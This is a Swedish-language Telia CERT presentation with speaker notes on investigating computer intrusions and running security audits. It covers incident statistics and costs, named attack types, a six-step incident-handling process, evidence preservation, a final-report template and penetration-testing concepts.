Erfarenheter vid dataintrång och IT-säkerhetskontroller · Riksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samt Brottsförebyggande Rådets rapport

1

Telia AB

Erfarenheter viddataintrång ochIT-säkerhetskontroller

TeliaCERT CCTelefon/fax: 08-713 1872/2657

E-post: [email protected]: http://www.t-cert.telia.se

2

Telia AB

Agenda

u Inledningu Utreda säkerhetsincidenter (intrång)u Utföra säkerhetskontroller

u Checklistor

u Sårbarhetskontrolleru Penetrationstester

u Trenderu Överbelastningsattacker

3

Telia AB

Statistik

1994 1996 1997 1998

CERT CC 2241 2573 2134 3734

EuroCERT - - 1450 2800

TeliaCERT - 50 1700 400

FBI 500 2500 3000 4000

Det finns idag inga exakta uppgifter på hur många dataintrång som sker. Viss statistik finnshos brottsutredande myndigheter, säkerhetsorganisationer och Internetleverantörerna, mendenna är inte heltäckande då den enbart avser de brott som anmälts. Många drar sig för attanmäla intrångsförsök eller dataintrång på grund av att det kan ge dåligt rykte.

Det görs dock årligen undersökningar av FBI och Computer Security Institute avseende IT-relaterade brott. I den senaste rapporteras att 163 företag förlorade 984 miljoner kronor[CSIFBI99]. Samma undersökning visar att antalet dataintrång från utomstående ökar förtredje året. Närmare 30% av de som svarade hade råkat ut för ett dataintrång och 57%anmälde att attacken kom via deras Internetuppkoppling. För svenska förhållanden finnsRiksrevisionsverkets rapport ”Datorrelaterade missbruk och brott” [RRV33-97] samtBrottsförebyggande Rådets rapport om "IT-relaterad brottslighet" [BRÅ-00:2]. Båda visaratt den IT-relaterade brottsligheten ökar från till år.

I februari 1999 räknade tidningen InternetWorld att mer än 40 000 datorer hade blivitsmittade av trojanska hästar som NetBus och BackOrifice [InternetWorld, nr 2, 1999].Dessa datorer tillhör till största delen privatpersoner men även företag har drabbats. Blandannat fick en revisionsbyrå sin klientdatabas stulen. Telia rapporterar att de undervintermånaderna 1998/99 tog emot uppemot 150 anmälningar i månaden där angriparenanvänt Netbus eller Back Orifice [InternetWorld, nr 3, 1999].

4

Telia AB

Vad kostar en incident?

u RRV-97 549 KSEK 70 KSEKu CSI & FBI-98 990 MSEK 1,6 MSEKu NCC-97 99 KSEK 160 KSEKu ICAMP-95 270 KSEKu BRÅ-00 356 KSEK

Incidentkostnad Dataintrång

De kostnader som förknippas med ett dataintrång blir tyvärr väldigt höga. Detta beror påden tid det tar att sanera systemen, d.v.s. gå igenom operativsystem och applikationer för attsöka efter eventuella bakvägar, trojanska hästar och logisk bomber.

Engelska undersökningar visar att genomsnittskostnaden för att komma tillrätta med ettdataintrång ligger på mellan 30 000 kr - 160 000 kr [NCC92, AC94]. I Sverige harEffektivitetsrevisionen på Riksförsäkringsverket utfört en undersökning om datarelateradebrott hos svenska företag och organisationer under 1997. De redovisargenomsnittskostnaden är 549 000 kr för databrott (exkl. virus och stöld av hårdvara)[RRV33-97]. Genomsnittskostnaden för dataintrång är ca 70 000 kr. Dock har enbart enfemtedel av de som svarat kunna ange eventuella kostnader. Denna kostnad är betydligtlägre än vad övriga undersökningar redovisar. Varje år utför Computer Security Instituteoch FBI undersökning om IT-relaterade incidenter. De rapporterar attgenomsnittskostnaden för ett dataintrång är 1.6 MSEK [CSIFBI98]. Den genomsnittligakostnaden för dataintrång var 1992 över 3000£, 1994 över 16 000£

I rapporten ”Incident Cost Analysis and Modeling Project” [CICSWG] har man analyserat30 olika dataintrång. De rapporterar följande arbetsinsatser att komma till rätta med dessaincidenter:

§210 personer arbetade över 9078 timmar

§antalet drabbade datorsystem uppskattades till 270 805 system

§saneringskostnaden var 8.2 MSEK

Detta ger en genomsnittlig kostnad vid dataintrång på ca 270 000 kr.

5

Telia AB

Typer av hackerattacker

u Packet sniffing (tcpmon, gobbler)

u Knäcka lösenord (NT/W95)

u Brister i system (felkonfiguration, exploits)

u Protokoll-baserade attacker (Waterfall, ftp, chargen)

u Tillgänglighetsattacker (Smurf, Bo(i)nk, (New)Tear)

u War dialing (ToneLoc, PhoneTag, BlueBeep)

u Social engineeringu Distribuerade tillgänglighetsattacker

Det har blivit allt vanligare att trojanska hästar öppnar upp vägar in i system. Dessa haralltid funnits men har under det senaste året blivit ”var mans egendom”, t.ex. genomNetbus, Back Orifice, Donald Dick, Sub7 m.fl.

Avsökning av system och nätverk sker i syfte att fastställa vilka typer av tjänster som finnstillgängliga samt programtyp och version. Utifrån dessa uppgifter kan man sedankontrollera om dessa är sårbara för någon känd säkerhetsbrist. Dessa brister finnspublicerade på webbplatser som bl.a. www.securityfocus.com, www.insecure.org,www.ntbugtraq.com

Olika typer av avsökningar används för olika syften:

•network mapping för att kartlägga nätverket och dess arkitektur

•probing för att samla information om system och nätverk

•portscanning för att kontrollera vilka tjänster som finns tillgängliga på system

•cgi-scanning för att söka efter brister i webbserverns cgi-tjänster

6

Telia AB

Kunder installerar patchi sina system

Distribuerar patchSkapar olika nationella varianter (NT)

Testar patchförpackar i servicepack eller hotfix

Leverantör läser bugtraqSkapar patch

Script-KiddiesAnvänder verktyget i volym

Sprider verktyget allmänt

Nyttjar verktyget inom egna gruppen

"Ond" Hacker läser bugtraqBygger verktyg kring exemplet

Postar på BugTraq(mejlinglista)

"God" HackerHittar brist i pgmGör exempelkod

< 1v

~ 2v

~ 2 - 3v

2v - ∞

< 1v

~1- 5 v

< 1v

1v - ∞

CERTADV

En säkerhetsbrist liv och leverne

Brister hittas kontinuerligt i operativsystem och systemprogramvara.Efter release av en produkt från en leverantör kommer den att vara under Internetsargusögon.Hur hittas då dessa brister? Detta är ett flöde på hur detta kan ske.

1) Intresserade ’hackers’ som genomför tester, dels genom djupa studier av källkod menäven massiva tester med ’elak’ program mot programmen. Det hittar någon typ av brist.Beroende på om hackern är godhjärtat eller ’ond’ kan ett antal saker inträffa.Vi utgår från att han är ’god’.

Postning sker på Bugtraq, eventuellt en signal till CERT och kansk även leverantören.

Efter denna publicering sker ofta parallella aktiviteter, dels hos leverantören, men också hosden ’onda’ undergroundkulturen.

Leverantören har en fix som distribueras inom 1 månad.

Hur lång tid det tar till den är inför hos alla vet ingen!

Hackerkulturen har samtidigt byggt ett verktyg som ger ’vem som helst’ möjlighet attutnyttja den givna bristen.

7

Telia AB

UTREDA IT-SÄKERHETSINCIDENTER(Dataintrång)

Inom företag och organisationer saknas det oftast rutiner för hur man ska hantera IT-säkerhetsinciden-ter. Om dessa upptäcks hanteras de ’ad hoc’, negligeras eller avskrives dåman inte vet vart man ska vända sig för att anmäla händelsen och inte vet var man kan fåhjälp.

I vissa företag och organisationer finns det flera olika enheter som tar emot anmälningar omIT-relate-rade incidenter, t.ex. Helpdesk, driftsupport, kundtjänst, säkerhetsavdelning. Omdessa enheter inte är samverkande kan detta ge flera problem avseende rapportering ochhantering, bl.a. att anmälningar utreds från två olika enheter, ovetande om varandrasrutiner, dels att anmälningar faller mellan stolarna.

Orsaken till dessa problem är bl.a. avsaknaden av en klar definition av termer och begreppsamt förankring av roller. Dessutom gör avsaknaden av en etablerad och accepterad enhetdit IT-säkerhetsinci-denter rapporteras, att man inte vet hur den verkliga bilden ser utavseende inträffade IT-säkerhets-incidenter, om de har inrapporterats, hur de har hanteratsoch vilka kostnader som uppstått.

Genom att inom företaget och organisationer strukturera organisationen förincidenthantering och etablera rutiner för att ta emot anmälningar, hantera och samordnaIT-säkerhetsincidenter erhålls en:

•enhet som kan bistå med kompetens och erfarenhet som rådgivare eller deltagaresamt samordning vid utredning av IT-säkerhetsincidenter

•enhet som snabbt och effektivt hjälper till att stoppa och begränsa skadorna avIT-säkerhetsinci-denter samt minska sannolikheten att samma IT-säkerhetsincidentinträffar igen

•samordnande enhet som underlättar för kunder och andra intressenter att komma ikontakt med rätt enhet inom företaget eller vice versa, t.ex. kontakter medpolisväsendet, Internetleverantörer (ISP) och säkerhetsgrupperingar som CERT

Detta är några av de resultat som kan uppnås. En av de viktigare är dock de signaler ensnabb och effektiv hantering ger till anställda och eventuellt externt involverade parter.

8

Telia AB

6 grundbalkar

1. Förberedelser2. Identifiera incidenten3. Stoppa och begränsa konsekvenserna4. Analysera och eliminera orsakerna5. Återställning6. Uppföljning

Källa: NSWC Dahlgren Computer Security Incident Handling Procedure (http://all.net)

De rutiner som beskrivs i SANS Institutes incidenthanteringsplan [SANSIH99]. Dessarutiner de kan användas som "ledstjärna". Rutinerna består av 5 steg, nämligen:

§Kvalificering av vilken typ av säkerhetsincident rör det sig om

§Begränsa skadeverkningar och stoppa skeendet

§Bekämpa orsaken till att detta kunde inträffa och förbättra för attförhindra en återupprepning

§Återställande till normal verksamhet

§Uppföljning och återkoppling

9

Telia AB

Förberedelser

u Förhindra att incidenter inträffaru Regler och riktlinjer (IT-säkerhetspolicy)u Anvisningar och checklistor

u Säkra systemen och externa kopplingar

u Följa upp loggfileru Ordning och reda (ex. dokumenterat nätverk- och systemmiljö)

u Hålla sig à jouru Säkerhetsbrister, uppdateringar, nyheter

Förberedelse

Det bästa sättet att förhindra säkerhetsincidenter är att se till att de inte kan inträffa. Etthjälpmedel för detta är att ha enkla regler och riktlinjer, aktiverade säkerhetsfunktioner,följa upp loggfiler och analysera system- och nätverksanvändning samt hålla sigunderrättad om säkerhetsbrister och uppdatera system när så krävs.

Genom att ha fastställda regler hur företagets system och information får användas samtvad som kan hända om dessa regler överskrides, kan man få en god grund att byggaföretagets moraliska anda.

Användande av kontrollistor, s.k. Besiktningsprotokoll för system, kan man skapa engemensam säkerhetsnivå för systemen. Dessa checklistor används även för att upprätthållasäkerheten, dvs man gör återkommande kontroller.

Någon måste hålla sig à jour med vad som händer, nya säkerhetsbrister, nya rättningar, nyahackerverktyg m.m. Har man kännedom om detta finns det förutsättningar att förhindraonödiga säkerhetsincidenter/dataintrång bara för att man glömt att patcha systemen.

10

Telia AB

Identifiera incidenten

u Utse ansvarigu Kvalificera händelsenu Bedöm omfattning

u skadeanalys

u konsekvensanalysu Finns temporär lösning

u Säkerställ loggfileru Meddela ansvariga

Identifikation

När en säkerhetsincident inrapporteras ska en ansvarig utses. Denna persons första uppgiftär att kvalificera säkerhetsincidenten huruvida det är en säkerhetsincident och desskonsekvenser. SANS Institute rekommenderar att denna person bör ha ett helhetsperspektivoch arbeta för hela organisationen.

Det händer med jämna mellanrum att en inrapporterad säkerhetsincident inte är något annatän ett misstag, t.ex. en systemadministratör har slagit in fel IP-adress eller systemnamn,felkonfigurering, tolkat loggfiler fel m.m.

Genom att fastställa omfattningen av säkerhetsincidenten får man en indikation på vilkendel av organisationen och vilka användare som berörs av säkerhetsincidenten samt desskonsekvenser. Bedömningen av omfattningen kan göras i två delar, nämligen:

•skadeanalys, som visar på vilka system, nätverk, applikationer och tjänster somdrabbats

•konsekvensanalys, som ger en indikation på vad detta innebär för organisationen, vad etteventuellt driftstopp på drabbade system innebär och kostar, vad är värdet på informationoch hur kan organisationens image påverkas

Det kan även vara så att säkerhetsincidenten även berör organisationer, grupper ellerpersoner utanför den egna organisationen. I detta fall måste man göra en initial bedömningom och hur dessa påverkas. Man måste även bedöma hur den egna verksamheten ochimage kan påverkas när kontakt tas med drabbade leverantörer, kunder och andraaffärskontakter.

Det är viktigt att på ett tidigt stadium säkerställa loggfiler, resultat från kommandon ochinspelade sessioner, etc. Dessa kan komma att användas som bevis i en eventuell rättsligprövning. Det insamlade materialet måste kunna ge en obruten kedja av bevis som kanbinda en eventuell person vid händelsen.

När man konstaterat omfattning och konsekvens samt gjort en initial bedömning omeventuell snabb- eller temporär lösning bör man söka kontakt med ansvarig. Detta kan varaenhetschef, systemägare, IT-säkerhetschef och affärsansvarig. Detta bör följa denkontaktlista man upprättat tidigare.

11

Telia AB

Grund-kontroll

Då man undersöker system och nätverk är det nödvändigt att inte avslöja att man upptäcktoch förstått situationen. Om det är en säkerhetsincident, t.ex. ett dataintrång, som ärpågående är det mindre bra att röja sina närvaro. Detta kan förvarna eller skrämmainkräktaren så att han försvinner, radera sina spår eller förstör systemen.

Undvik att spåra från det drabbade systemet eller system som tillhör den drabbade enheten.Använd istället ett system som är fristående eller som en unik adress skild från övriga.Detta för att inte inkräktaren, om han är paranoid och har satt upp larm, ska varnas attnågon på hans mål har upptäckt honom.

Undvik att söka efter spår och framför allt nätverkskopplingar med kommandon som röjerdig. Undvik om möjligt ping, telnet, nslookup, finger m.fl ”högljudda” kommandon.

Var noga att hålla dig inom organisationens systemgränser. Det är väldigt lätt attengagerade medarbetare undersöker system och nätverk som inte tillhör den drabbadeorganisationen och på så sätt kan göra sig skyldig till oegentligheter och eventuelltdataintrång.

Samla data enligt fastställda rutiner

Följ de fastställda rutiner som finns för incidenthantering samt för att kontrollera system-och nätsäkerhet.

12

Telia AB

Karakteristika

Det man vill få indikationer på kan vara omincidenter:u är återkommandeu drabbar, utlöses eller upptäcks av samma

person eller avdelningu omständigheter kring incidenteru inträffar på speciella tider eller datum

Identifikation

Det man vill få indikationer på kan vara om incidenter:

•är återkommande

•drabbar, utlöses eller upptäcks av samma person eller funktion

•omständigheter kring incidenter

•inträffar på speciella tider eller datum

All denna information kan användas för att klargöra om incidenter kan orsakas av oklarainstruktioner eller otillräcklig utbildning hos användare och handläggare, om det inträffarpå tidpunkter på dygnet då man är trött och mindre uppmärksam, m.m.

13

Telia AB

Stoppa och begränsa

u Etablera [temporär] incidentgrupp samt genomgångu Håll en låg profil. Starta inga krig!u Fastställ och undvik använda ev. förändrade program,

kod etcu Säkerhetskopiering av drabbade system

u Observera och samla data enligt fastställda rutiner

Stoppa & begränsa

Den ansvariga utser en incidentledare som ska leda incidentgruppens arbete. Medlemmarnai incidentgruppen ska utses. Oftast är flera av dessa självskrivna såsom representation frånett Computer Security Incident Response Team (CSIRT), teknisk och ev. administrativpersonal från den drabbade enheten, beslutsfattare m.fl.

Alla ska även föra en incidentdagbok. Detta är speciellt viktigt för incidentledaren men börföras av alla deltagare i incidentgruppen. I denna noteras vem som har sagt vad och tillvem, dels inom gruppen och dels ut från gruppen samt andra iakttagelser och teorier.Negativa spår och ovanliga händelser bör även noteras. För alla noteringar ska äventidpunkt noteras. Dessa kan användas för att i efterhand rekonstruera olika skeenden ochhändelseförlopp.

Man bör undersöka om det finns någon snabb eller temporär lösning påsäkerhetsincidenten. Detta måste vägas mot den bedömning som gjordes i förra punkten.

Om säkerhetsincidenten kan åtgärdas genom en snabb och effektiv lösning som inte harstörre konsekvenser. Det kan t.ex. vara att blockera en IP-adress, tjänst, applikation ellersystem.

14

Telia AB

Incidentgruppen

u Beslut om ansatsu Slänga ut ev. inkräktareu Hålla kvar och övervaka hans/hennes mått och steg, samla bevis

u Koppla från/separera drabbade systemu Byt lösenord, sätt ut ev. fällor etc

u Dubbelkolla erhållen informationu Håll drabbad miljö ”orörd”u Håll en låg profil

u Använd fastställda rutiner

Stoppa & begränsa

Ett av de svårare besluten är vad som ska göras med drabbade system. Det som står tillbuds är att, efter bedömning av insamlad information, stänga av systemet, koppla systemetfrån nätverket, isolera systemet i nätverket och tillåta att systemet ”lever vidare”.

Beslutet beror naturligtvis på en mängd omständigheter som t.ex. vad det drabbadesystemet används till och informationens värde och klassificering, kostnader för eventuelldriftstopp, tillgänglighetskrav från användare, policy.

Om organisationens policy eller om incidentledare beslutat att man ska försöka fångainkräktaren eller samla mera information till bevisning, kan man sätta upp fällor, s.k.honeypots. Detta är separata system som innehåller fabricerade uppgifter som kan betraktassom intressanta av inkräktaren.

Honeypots har använts i flera kända fall och de har haft väldigt bra utdelning. I samtligafall har man lyckats att samla mera information och bevis om inkräktaren samt man harlyckats hålla inkräktaren ”online” tillräckligt länge för att utföra en telefonispårning.

Det finns flera beskrivningar hur man bör sätta upp honeypots, hur dessa kan konfigurerasoch administreras samt hur man ”föder” den med intressant information. Det är ingen trivialuppgift att hålla intresset vid liv hos en eventuell inkräktare. För mera information om fällorrekommenderas Fred Cohens verktyg Deception Toolkit, DTK (http://all.net).

15

Telia AB

Analysera och elimineraorsakerna

u Fastställ orsak och symptomen av incidentenu Eliminera orsakerna till incidentenu Förbättra säkerhetsskyddetu Säkerhetskontroll, verifiera nätverket och

närliggande systemu Fastställ senaste ”friska” backup

Stoppa & begränsa

Ett av incidentgruppens arbetsuppgifter är att fastställa hur det inträffade kunde ske. Omman inte får kunskap om hur säkerhetsincidenten emanerade kan man inte åtgärda denna.

Det kan ibland vara svårt att fastställa exakt hur vilken angreppsmetod som använts. I dessafall kan man ranka de mest troliga och vidta åtgärder för att förhindra en återupprepning.

Säkerhetsbristen i det drabbade systemet kan ha varit känd en längre tid och informationom denna spridits och fortsatt att spridas efter det att säkerhetsincidenten upptäckts ochåtgärdats. Detta gör att det kan pågå försök till att använda den ”kända” säkerhetsbristenflera veckor efter ”sanering” för att få åtkomst till det aktuella systemet.

Dessutom ska man räkna med fortsatta försök att använda den aktuella säkerhetsbristen,kartläggningar (scans/probes) samt andra säkerhetsbrister.

Genom att förbättra säkerhetsskyddet på det drabbade systemet och system i dess närhetkan man undvika nya säkerhetsincidenter. Man bör ha större uppmärksamhet på loggfileroch nätverksaktiviteter en tid efter incidenten för att upptäcka och förhindra eventuellaåterbesök.

Efter att säkerhetsskyddet förbättrats bör detta verifieras. Även närliggande system ochnätverk bör kontrolleras. Detta kan göras med kommersiella verktyg, egna uppdateradechecklistor samt manuella metoder.

Naturligtvis ska man kontrollera systemet avseende närbesläktade säkerhetsbrister.

16

Telia AB

Utredningsprinciper

u Korrektu Trovärdigu Komplettu Tidsriktig (samtida)u Kontrollerad form

Utredning av databrott ställer stora krav på utredande enhet. De måste kunna analyserafallet och måste ta hänsyn till brottets art, bevisning, utredningskostnader och möjlighetertill åtal. Det är ingen hemlighet att de flesta som döms för dataintrång i Sverige enbart harfått dagsböter. För att lyckas med en utredning måste man följa ovanstående punkter:• korrekt utförd (dvs handlingsplan och åtgärdslista är att föredra så att man inte missarnågot), trovärdig då inget ska undantas som är relevant för utredningen•Den ska vara komplett med loggar och annan bevisning.•Tidsriktigheten innebär att man ska kunna påvisa en händelsekedja som håller. Utan dennakan det vara mycket svårt att gå iland med utredningen.•Till slut ska utredningen hanteras och dokumenteras i en kontrollerad form.

Utredarna måste kunna göra en initial bedömning av brottet om det ens lönt att utreda. Detär flera faktorer som påverkar denna bedömning.

Det anmälda brottet kan vara svårt att precisera. Detta märks väl i anstormningen avpolisanmälningar där målsägaren utsatts för dataintrång via programmet Netbus. I de fall dåmålsägaren själv har lyckats spåra angriparen har man använt programmet Netbuster. Dettaprogram öppnar upp och publicerar en tjänst för omvärlden, precis som en webbserver. Omen angripare kopplar upp sig mot den publicerade porten så loggas uppkopplingen. Detviktiga med Netbuster är att den stoppar angriparen och kan ge ut falsk information.Angriparen tillåts alltså inte att komma in i datorn. Detta är då inget dataintrång utan enbartett försök därtill. Huruvida det kan hålla för åtal när man medvetet sätter upp en tjänståterstår att prövas.

Brottet kan var utfört på ett tekniskt avancerat sätt att så att det kan vara svårt att förklaraför personer som ej har gedigna kunskaper inom IT-området. Detta ska ställas mot detfaktum att de flesta nämndemän inte har någon grundläggande datautbildning och kan tilloch med vara motståndare och rädda för tekniken.

Utredarnas arbetsbelastning kanske inte klarar ett omfattande utredningsarbete och manavvaktar i väntan på mera resurser.

Svag bevisningen gör att utredningen inte drivs vidare då man inte ser att bevisningen hållerför ett åtal.

När utredningen är klar kanske målsägaren drar tillbaka sin anmälan, dels på grund av denrisk för publicitet om polisanmälan görs, dels på grund av att man är rädd för brottetupprepas.

17

Telia AB

Informationsinsamling

u Vem ska söka (extern/intern expert)?u Vad söker vi efter?u När ska vi söka?u Var är det?u Hur kan vi finna det?u Varför söker vi efter det?

Handlingsplanen för hantera säkerhetsincidenter ska ge verksamheten stöd för införande avskyddsåtgärder för förhindra och minimera de skador som kan uppkomma i samband medeventuella säkerhetsincidenter. Dessutom ska den visa på hur självaincidenthanteringsgruppen ska arbeta. Detta kan innefatta explicita steg, t.ex. vad man skaleta efter, var det kan finnas, användbara åtgärder och kommandon.

Garfinkel och Spafford rekommenderar 2 viktiga åtgärder. Det första är att behålla lugnetoch inte hetsa upp sig eller råka i panik. Det kan låta fånigt men då jag kom på eninkräktare i mitt system var det något som verkligen fick mitt blod att rusa och adrenalinetgick i höjden. Naturligtvis gjorde jag fel i upphetsningen för jag ”nukade honom” ochförsvann ;-) innan jag hann undersöka vilka filer han hade inspekterat och eventuellt laddathem. Jag hann dock ta hans ”fotspår” så jag vet var han kom ifrån.

Den andra viktiga åtgärdern är att dokumentera allt. Det som inte finns på papper har intehänt. Det är väldigt viktigt för utredningen att allt är dokumenterat i rätt tidsordning, vemsom gjorde vad och vem som sa vad. Utan denna dokumentation kan hela bevisningen bliverkningslös.

Tyvärr är det så att det är först efter man själv har drabbats av en incident som man börjarfundera på att upprätta en handlingsplan vid säkerhetsincidenter.

18

Telia AB

Bevarande

u Identifiering (tydliga referenser)

u Dokumentation (vad och varför gjorde vi detta?)

u Beviskedjan (vad är förövarens syfte ochtillvägagångssätt - hur fungerar det i ”normal”läge?)

u Säkerhet (förvara på betryggande sätt)

I Sverige har vi fri bevisprövning.Brottsutredande myndighet avgör bevisets värde

I USA krävs att åberopat bevismaterial hanteras på korrekt sätt. Man måste kunna verifieraatt bevisen är korrekta, tillförlitliga och trovärdiga. Normalt är bevis som anses varahörsägen inte godtagbara, men det finns några undantag. För att dessa ska kunna användas irätten måste bevismaterialet vara:

•en naturlig del i den dagliga verksamheten, d.v.s. de får inte vara skapade enbartför rättegången

•vidimerade av något trovärdigt vittne som påvisar att bevismaterialet är trovärdigtoch korrekt

•originalmaterial, d.v.s. det får inte vara kopior eller sammansatta kopior

Det gäller även att de som samlar in och säkerställer ev. bevismaterial har tillräckligkunskap för att kunna verifiera att den interna utredningen och insamling av bevis har skettpå ett yrkesmässigt sätt. Annars finns det stor risk att bevismaterialet inte anses vara korrektoch trovärdigt. Samma principer anses gälla i Sverige.

I Sverige har vi fri bevisprövning. Målsägaren kan avgöra vad som kan räknas sombevismaterial men brottsutredande myndighet prövar dessa. De avgör hur viktigt ett bevisär och hur det kan användas. Skulle man inte vara tillfreds med deras värdering avbevismaterial kan man överklaga till åklagaren och därefter till överåklagare.

Detta gör det än viktigare att förklara händelseförloppet, den brottsliga gärningen och hurman leder detta till bevis. Presentationen för att få förståelse är A och O.

Intressant information är uppkopplingstider och hur länge, tillfällen då e-posttjänstenanvänds, i vissa fall själva e-brev, e-brevlistor och chatloggar, historik och cookie-filersamt lagringsmedia.

Loggfiler från operativsystem, och i vissa fall applikationsloggar, anses vara trovärdiga.

19

Telia AB

Återställning

u Återläs senast ”friska” backupu Återställ system och applikationeru Konfigurera system, applikation och säkerhetu Validera systemetu Produktionssättningu Övervaka

Återställ

Det är viktigt att inte återläsa säkerhetskopior som kan innehålla den användasäkerhetsbristen eller andra komprometterade program eller enheter. Om man är nödd tillatt göra detta måste man sanera systemet, uppdatera operativsystem, nätverkskomponenteroch applikationer med senaste fungerande version. Därefter bör man göra en validering avsystemet för att kontrollera att det fungerar som det ska och att säkerheten har acceptabelnivå.

Efter återställning ska system och applikationer konfigureras så att minst sammasäkerhetsnivå uppnås som man hade innan säkerhetsincidenten. Därefter börsäkerhetsskyddet förbättras.

Efter att säkerhetsskyddet förbättrats bör detta verifieras. Även närliggande system ochnätverk bör kontrolleras. Detta kan göras med kommersiella verktyg, egna uppdateradechecklistor samt manuella metoder.

Naturligtvis ska man kontrollera systemet avseende närbesläktade säkerhetsbrister.

Återigen, det är viktigt att ha större uppmärksamhet på loggfiler och nätverksaktiviteter entid efter incidenten för att upptäcka och förhindra eventuella återbesök samt för kontroll attman inte glömt att stänga eller korrigera eventuella bakdörrar.

20

Telia AB

Uppföljning

u Ta fram en slutrapportu Incidentledaren är dokumentansvarigu Starta snarast efter incidentarbetet

u Använd mall på nästa sidau Hela incidentgruppen ska deltaga/få remissu Försök nå konsensus

u Summera på max 1 sida

u ”Vad har vi lärt oss”-möteu Gå igenom slutrapport

u Fånga upp ”eftertankar”

Uppföljning

Det är nödvändigt för den fortsatta verksamhet att säkerhetsincidenter och incidentgruppensarbete följs upp. Detta har flera orsaker och det främsta är för att kunna göra ett bättrearbete nästa gång en säkerhetsincident inträffar.

En uppföljningsrapport kan påvisa att förändringar måste genomföras inom t.ex.:

•rapporteringsrutiner

•ansvarsfördelning

•samverkanformer

•samordning, insatser och återrapportering till incidentledare beslutsvägar

Man bör utvärdera händelsen och dess hantering för att ge återkoppling till ledning,säkerhetsfunktion, driftenhet m.fl.

Denna utvärdering/återkoppling visar bl.a. på hur upptäckten skedde, tidsrymd mellanupptäckt och åtgärd, vidtagna åtgärder och dess effektivitet samt resultat. Dessutom skaman redovisa eventuellt upptäckta brister ursprunglig miljö, brister i hantering och rutinersamt återföra detta till en erfarenhetsbank. Även indirekta och direkta kostnader börredovisas.

21

Telia AB

Uppföljning

u 1. Sammanfattning

u 2. Utredningshistoriku 3. Omfattning

u 4. Åtgärder4.1 Incidenthantering

u 4.1.1 Utförda åtgärderu 4.1.2 Ej utförda åtgärder

4.2 Säkerhetshöjande åtgärder4.3 Långsiktiga åtgärder

Uppföljning

• 5. Erfarenheter och noteringar5.1 Utredningssvårigheter5.2 Roller och ansvar5.3 Säkring av spår5.4 Att få fram uppgifter5.5 Obekräftade uppgifter5.6 Ev. polisanmälan

• 6. Ersättningskrav6.1 Våra kostnader6.2 Externa kostnadskrav6.3 Våra skadeståndskrav

• 7. Rekommendationer

Slutrapporten kan innehålla:

De flesta är behjälpliga med en beskrivning, eller dokumentmall som visar hur ensäkerhetsincident kan dokumenteras. En rapport avseende en säkerhetsincident kaninnehålla följande rubriker:

•Incident- och brottsrubricering

•Gärningsbeskrivning med omfattning, konsekvens, teknisk nivå, m.m.

•Skadeståndskrav

•Kostnader

•Utredningssvårigheter

•Erfarenheter

•Rekommendationer och förbättringsförslag

Innan åtgärder i form av polisanmälan eller liknande utförs mot en misstänkt person skallhela materialet granskas av en för utredningen extern person. Syftet är att se attresonemanget håller, att det är lättförståeligt samt att händelsekedjan sitter ihop. Enincidenthanteringsgrupp med teknisk kompetens kan bistå vi denna typ av granskningar.

22

Telia AB

Tips

u För incidentdagboku Ändra inte data - arbeta på kopia (backup)u Utse en (1) kontaktperson för BRUMu Informera enbart berörda (innersta kretsen)

enligt planu Använd etablerade informationskanaleru Skilj på vad du vet och vad du troru Dubbelkolla alla källor

Beskriv vad som har hänt. Om det är ett brott mot ordinarie rutin, handgrepp så beskriv hurdet utförs korrekt och enligt regelboken. Förklara men gräv inte ned dig i onödiga detaljer.Saknas uppgifter eller om något är oklart kommer utredarna kontakta dig för att få detförklarat. Det du förlorar är tid och utredningstakten kan slås av då de kanske lägger dittfall åt sidan medans du söker i loggfiler och talar med systemtekniker för att söka klarhet.Det är direkt tjänstefel av brottsutredande myndigheter att lägga ned en utredning de inteförstår – däremot kan de sinka arbetet om de inte förstår. Detta hör till den mänskligafaktorn då de ej vill visa sin okunskap, alternativt väntar in att någon specialistkompetensblir ledig eller de utbildar sig.

Vidare bör man ställa sig frågan: Hur mycket kan vi berätta? Kommer anmälan attinnehålla känsliga uppgifter för enskild, kan de vara för skada för annat företag, kan deskada oss eller är det företagshemliga uppgifter. Detta måste värderas. Anser man att det ärkänsliga uppgifter ska man bifoga sin utredning som separat bilaga med begäran omsekretess och hänvisning till eventuellt lagrum.

23

Telia AB

De sju dödssynderna

N Rapporterar ej eller ber ej om assistans/hjälpN Ofullständiga eller avsaknad av anteckningarN Fel hanterade eller förstörda uppgifter (=bevis)N Inga fungerande säkerhetskopiorN Ej begränsat skadan eller ej tagit bort det som

orsakat/möjliggjort incidentenN Ej förhindrat återupprepningN Inte lärt sig av tidigare erfarenheter

Dessa 7 dödssynder talar för sig själva.

De medför ofelbart att hantering försvåras och att utredningen kan omöjliggöras.

24

Telia AB

SÄKERHETSKONTROLLER

25

Telia AB

Logisk Säkerhetskontroll

Konfigurations-och

Checkliste-kontroll

Säkerhetskontroll(Security Audit)

Penetrationstest

SäkerhetsRond

SäkerhetsRevision

Administrativ och Fysisk kontroll

Vid en konfigurations- och checklistekontroll kontrolleras systemet utifrån en givenchecklista, t.ex. checklista för UNIX, checklista för Windows/NT. Konfigurationsfiler isystemet och för dess applikationer granskas också. Ansatsen är att agera som ensäkerhetsmedveten systemadministratör.

Vid en säkerhetskontroll sker kontroller av att system och tjänster är konfigurerade på ettsäkerhetsmässigt korrekt sätt samt att dessa har motståndskraft mot intrångsförsök.Säkerhetsvalidering innebär även att man försöker finna eventuella säkerhetsbrister ochluckor som kan innebära en säkerhetsrisk i produkten eller tjänsten. Detta utförs med hjälpav säkerhetsanalyser, penetrationstester eller granskning av kravspecifikationer medavseende på säkerhet.

Ett penetrationstest innebär att systemets säkerhet kontrolleras. Syftet är att erhållaåtkomst till målsystemet, inte att kartlägga alla brister. Testet utförs, mot bakgrund avkunskap om vanliga fel och brister i operativsystem och nätkonfiguration samt hantering avsystem, för att upptäcka eventuella svagheter. De svagheter som upptäcks används för att,under kontrollerade former, ta sig in i system och nät. Dessa kontroller kan även påvisabrister i administrativa rutiner och regler, t.ex. om kontroller utförda inompenetrationstestet upptäcks, om loggfiler kontrolleras och om man följer fastställdaregelverk (policys) samt vilka åtgärder man vidtager.

26

Telia AB

Konfiguration/checklistor

u Innehåller ”best practice” i konfigurationskunskapu Korrigerar välkända brister där det finns verktyg för

’script-kiddies’u Uppdateras regelbundetu Är obligatoriska att appliceras på system

27

Telia AB

Checklistor, exempel

u SANS Institute’s Step-by-step Guides (www.sans.org)u Securing Windows NTu Securing Solarisu Securing Linux

u Ntbugtraqu Russ’ NT Security FAQ

u Microsoft (www.microsoft.com/security/tools.asp)u Windows NT Configuration Checklist

u IIS 4.0 Security Checklist

u Misti (Audit Program and Information Security Review Kits)

